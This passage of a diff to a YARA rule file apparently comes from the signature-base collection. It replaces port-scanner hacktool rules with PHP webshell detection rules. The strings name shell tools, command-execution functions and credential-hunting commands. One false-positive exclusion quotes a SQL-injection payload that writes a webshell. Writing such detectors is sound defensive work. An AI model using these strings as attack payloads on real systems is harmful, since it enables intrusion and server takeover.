+		importance = 70
 
 	strings:
-		$s0 = "Scan Ports Every"
-		$s3 = "Scan All Possible Ports!"
+		$wfp_tiny1 = "escapeshellarg" fullword
+		$wfp_tiny2 = "addslashes" fullword
+		$gfp_tiny3 = "include \"./common.php\";"
+		$gfp_tiny4 = "assert('FALSE');"
+		$gfp_tiny5 = "assert(false);"
+		$gfp_tiny6 = "assert(FALSE);"
+		$gfp_tiny7 = "assert('array_key_exists("
+		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
+		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
+		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
+		$gfp_tiny11 = "; This is the recommended, PHP 4-style version of the php.ini-dist file"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp8 = /\(\s?\$_HEADERS\s?[\)\[]/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$inp20 = "TSOP_" wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.{0,500}|e'" nocase wide ascii
+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus66 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_bit_sus75 = "uploaded" fullword wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "str_rot13" fullword wide ascii
+		$gif = { 47 49 46 38 }
+		$cmpayload1 = /\beval[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload2 = /\bexec[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload3 = /\bshell_exec[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload4 = /\bpassthru[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload5 = /\bsystem[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload6 = /\bpopen[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload7 = /\bproc_open[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload8 = /\bpcntl_exec[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload9 = /\bassert[\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cmpayload10 = /\bpreg_replace[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
+		$cmpayload11 = /\bpreg_filter[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
+		$cmpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cmpayload20 = /\bcreate_function[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload21 = /\bReflectionFunction[\t ]{0,500}\([^)]/ nocase wide ascii
+		$fp1 = "# Some examples from obfuscated malware:" ascii
+		$fp2 = "{@see TFileUpload} for further details." ascii
 
 	condition:
-		all of them
+		not ( any of ( $gfp_tiny* ) or 1 of ( $fp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( filesize < 1000 and not any of ( $wfp_tiny* ) ) or ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) and ( filesize > 5KB or not any of ( $wfp_tiny* ) ) ) or ( filesize < 500KB and ( 4 of ( $cmpayload* ) ) ) )
 }
-rule SIGNATURE_BASE_Domainscanv1_0
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Callback : FILE
 {
 	meta:
-		description = "Auto-generated rule on file DomainScanV1_0.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "94ead827-8b29-5cb5-82b6-a7ca5087bf7e"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L185-L202"
+		description = "php webshell having some kind of input and using a callback to execute the payload. restricted to small files or would give lots of false positives"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e33dba84-bbeb-5955-a81b-2d2c8637fb48"
+		date = "2021-01-14"
+		modified = "2023-09-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L413-L718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
-		logic_hash = "b06d902528fee5d1718d0a2984af3314e92e1ec7033c7596f9fb0e51a20eb848"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "e98889690101b59260e871c49263314526f2093f"
+		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
+		hash = "81388c8cc99353cdb42572bb88df7d3bd70eefc748c2fa4224b6074aa8d7e6a2"
+		hash = "27d3bfabc283d851b0785199da8b1b0384afcb996fa9217687274dd56a7b5f49"
+		hash = "ee256d7cc3ceb2bf3a1934d553cdd36e3fbde62a02b20a1b748a74e85d4dbd33"
+		hash = "4adc6c5373c4db7b8ed1e7e6df10a3b2ce5e128818bb4162d502056677c6f54a"
+		hash = "1fe4c60ea3f32819a98b1725581ac912d0f90d497e63ad81ccf258aeec59fee3"
+		hash = "2967f38c26b131f00276bcc21227e54ee6a71881da1d27ec5157d83c4c9d4f51"
+		hash = "1ba02fb573a06d5274e30b2b05573305294497769414e964a097acb5c352fb92"
+		hash = "f4fe8e3b2c39090ca971a8e61194fdb83d76fadbbace4c5eb15e333df61ce2a4"
+		hash = "badda1053e169fea055f5edceae962e500842ad15a5d31968a0a89cf28d89e91"
+		hash = "0a29cf1716e67a7932e604c5d3df4b7f372561200c007f00131eef36f9a4a6a2"
+		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
+		hash = "de1ef827bcd3100a259f29730cb06f7878220a7c02cee0ebfc9090753d2237a8"
+		hash = "487e8c08e85774dfd1f5e744050c08eb7d01c6877f7d03d7963187748339e8c4"
+		logic_hash = "e12dec5252a816c10443fe0e0b40b0b9b4a187b32facd8e09e1f057801da25f9"
+		score = 60
+		quality = -128
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "dIJMuX$aO-EV"
-		$s1 = "XELUxP\"-\\"
-		$s2 = "KaR\"U'}-M,."
-		$s3 = "V.)\\ZDxpLSav"
-		$s4 = "Decompress error"
-		$s5 = "Can't load library"
-		$s6 = "Can't load function"
-		$s7 = "com0tl32:.d"
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$gfp_tiny3 = "include \"./common.php\";"
+		$gfp_tiny4 = "assert('FALSE');"
+		$gfp_tiny5 = "assert(false);"
+		$gfp_tiny6 = "assert(FALSE);"
+		$gfp_tiny7 = "assert('array_key_exists("
+		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
+		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
+		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
+		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
+		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
+		$cfp3 = "<?phpclass WPML" ascii
+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus66 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
+		$gen_much_sus93 = "eval(\"/*" wide ascii
+		$gen_much_sus94 = "http_response_code(404)" wide ascii
+		$gif = { 47 49 46 38 }
 
 	condition:
-		all of them
+		not ( any of ( $gfp* ) ) and not ( any of ( $gfp_tiny* ) ) and ( any of ( $inp* ) ) and ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) and ( filesize < 1000 or ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) )
 }
-rule SIGNATURE_BASE_HKTL_Moorer_Port_Scanner
+rule SIGNATURE_BASE_WEBSHELL_PHP_Base64_Encoded_Payloads : FILE
 {
 	meta:
-		description = "Auto-generated rule on file MooreR Port Scanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "5d8fb83f-bed3-53d2-bd33-2158911dc7c8"
-		date = "2025-04-14"
-		modified = "2025-04-14"
